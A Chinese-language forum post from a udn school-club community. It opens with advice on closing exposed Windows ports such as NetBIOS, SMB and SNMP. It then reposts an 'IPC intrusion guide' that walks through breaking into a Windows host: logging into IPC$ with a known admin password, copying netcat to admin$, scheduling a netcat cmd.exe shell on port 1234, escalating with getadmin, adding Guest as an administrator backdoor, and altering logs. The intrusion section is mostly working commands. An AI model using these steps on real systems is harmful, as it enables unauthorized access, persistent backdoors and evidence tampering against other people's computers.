網路城邦
簡樂(ㄌㄜˋ)社
市長:
阿光老師
副市長:
加入本城市
|
推薦本城市
|
加入我的最愛
|
訂閱最新文章
udn
/
城市
/
學校社團
/
高中職
/
【簡樂(ㄌㄜˋ)社】城市
/討論區/
你還沒有登入喔(
馬上登入
/
加入會員
)
本城市首頁
討論區
精華區
投票區
影像館
推薦連結
公告區
訪客簿
市政中心
(0)
討論區
/
新東西。新學習
字體:
小
中
大
防止無使用到的 port 被攻擊的方法(看的懂就看吧)內附駭客攻擊實錄
瀏覽
10,953
|回應
0
|
推薦
0
lime300
等級:
留言
|
加入好友
轉至:http://yi-fan.no-ip.org/dz/viewthread.php?tid=1415&extra=page%3D3
HTTP : 80
FTP : 21 & 23
BT : 2048以上
禁止Windows 開放 NetBIOS 服務
NetBIOS是 Win 98, NT 4, 2000, XP 等作業系統預設上自動開啟的分享服務,使用者可以經過遠端方式存取本機電腦,預設包括 IPC$,
C$, Admin$ share等‧
基本上這是一個非常方便的資源,但由於它可以遠端連線存取,我們也必須顧慮到安全上的問題(例如敏感性資料、駭客/病毒入侵等)...
大部份情況下,我們甚至根本不需要這種服務存在! 所以,我們不如把Port 139 (NetBIOS) & 445 (SMB) 關閉
(以下適用給Windows 2000, XP使用者):
例如 : 337 338 .... 訊息傳遞port ...改成只出不入可以減少主機傳出port的數量
可以加快bt或ftp外傳輸
埠:161
服務:SNMP
說明:Simple Network Management Protocol(SMTP)(簡單網路管理協定)
SNMP允許遠端管理設備。所有配置和運行資訊的儲存在資料庫中,通過SNMP可獲得這些資訊。許多管理員的錯誤配置將被暴露在Internet。Cackers
將試圖使用默認的密碼public、private訪問系統。他們可能會試驗所有可能的組合。SNMP包可能會被錯誤的指向用戶的網路。
埠:137、138、139
服務:NETBIOS Name Service
說明:其中137、138是UDP埠,當通過網上鄰居傳輸檔時用這個埠。而139埠:通過這個埠進入的連接試圖獲得NetBIOS/SMB服務。這個協議被用於windows檔和印表機共用和SAMBA。還有WINS Regisrtation也用它。
這打開會開放共用權限
基本上所謂port打開是指作業系統會理會該port傳入的資料,並回應。某個成程度上可以下達指令,很危險
【Port 445】SMB Session
當Port 139不存在(無回應)的時候,Windows會自己自動開啟Port 445,也就是SMB Session (Server Message
Block)‧
如果這一個端口是開啟的,那麼遠端使用者就還是照樣有辦法知道您的電腦很多資訊,例如帳號清單(沒密碼)、密碼長度、密碼過期日期、系統名稱、
Domain... 等等‧ 所以,建議您關閉SMB Session:(R)
(netstat -a -n 可以檢查自己
有哪些port被開放不過
別再bt啟動下用)
以下轉載自 http://www.ntut.edu.tw/~t5598004/
IPC入侵全攻略
本文作者:不詳
文章出處:不詳
文章性質:轉載
閱讀次數:355
發佈日期:2006-02-13
IPC是Internet Process Connection的縮寫,也就是遠端網路連線。它是Windows NT及Windows
2000特有的一項功能,特點是在同一時間內,兩個IP之間只容許建立一個連接。好了,廢話少說,現在進入主旨。
如何找到具有IPC漏洞的主電腦呢?以前我都是群組合一個國外的掃瞄工具(名字我忘了)和KillUSA的LetMeIn,因為很多工作都是手動完成的,所
以速度可想而知了。現在因為有了小榕的流光2000,所以找到這樣的主電腦實在是太簡單了,具體操作我就不說了,大家可以參考該軟體的說明文檔。
好了,假設我們已經找到了一台這樣的主電腦,位址是139.223.200.xxx,管理員帳號是
Administrator,密碼是123456。進入指令行方式,正式開工。需要說明的是,以下操作都是在目的主電腦沒有禁止遠端IPC$連接和啟動
Schedule服務的理想情況下進行的。
F:\>net use \139.223.200.xxx\ipc$ "123456"
/user:"Administrator"
指令成功完成。
F:\>copy nc.exe
\139.223.200.xxx\admin$
已複製 1 個檔案。
F:\>net time
\139.223.200.xxx
\139.223.200.xxx 的目前的時間是 2000/12/25 上午 10:25
在
\139.223.200.xxx 的近端時間 (GMT - 07:00) 是 2000/12/25 上午10:35
指令成功完成。
F:\>at \139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
新增加了一項作業,其作業 ID = 0
F:\>telnet 139.223.200.xxx 1234
上面的指令很簡單,你只要參考一下net,at和nc的使用方式就可以了。這樣,我們就登上了遠端的主電腦。最理想的情況是這樣的,但是,也許你會遇到目的主電腦的Schedule服務沒有啟動的情況,那麼,at指令就不能用了,我們就需要增加以下步驟。
F:\>at \139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
服務仍未啟動。
F:\>netsvc \139.223.200.xxx schedule /start
Service is running on \139.223.200.xxx
登上遠端主電腦之後,我們可以做什麼呢?這要視這個帳號的權限以及該主電腦的安全策略來決定。如果你的權限不夠的話,可以試試下面的步驟。首先在近端執行下面的指令。
F:\>copy getadmin.exe \139.223.200.xxx\admin$
已複製 1 個檔案。
F:\>copy gasys.dll \139.223.200.xxx\admin$
已複製 1 個檔案。
其次,在遠端主電腦執行下面的指令。
C:\WINNT\system32>getadmin
如果成功的話,你就是這台主電腦的管理員了,權限夠大了吧?:-)
那麼,現在我們能做什麼呢?改主頁?下載SAM資料庫?都可以啦!方法有很多,我就不一一說了,具體方法可以參考相關教學。我一般對目的主電腦上的WORD文檔和資料庫比較感興趣,呵呵。。。
其實,如果你在這台機子上面放個木馬或是病毒什麼的東東,做起事來更容易一些,但是我覺得如果你跟他沒什麼深仇大恨的話,還是不要這麼做了,這樣不好。
作完了你要做的事,不要忘了做個後門。
C:\WINNT\system32>net user Guest
30906766
net use Guest 30906766
The command completed
successfully.
C:\WINNT\system32>net localgroup administrators
Guest /add
net localgroup administrators Guest /add
The command
completed successfully.
這是個比較簡單的後門,要想做的更好一些,可以像Linux那樣,做出一套RootKits來,其實這樣的東東目前已經有了,你只要拿來用就可以了。笛a真是簡單多了,那麼多的傻瓜工具任你用,哎!要想自保,不學點安全知識怎麼行呢?
最
後,我們得修理一下日誌。雖然Redp0wer告訴我很少管理員會看NT的日誌,但是我想修理一下還是有用的。NT的日誌在什麼地方呢?可以參考XUDI
的文章。但是有一點要記住的是,日誌只能修改,不能刪除,否則就是自己把自己出賣了!:-)這方面的指令行工具也不少,你可以到一些國外的站臺去看看。
其實有了這台主電腦,你還可以做的更多。
本文於 修改第 3 次
引用網址:https://city.udn.com/forum/trackback.jsp?no=63412&aid=3614783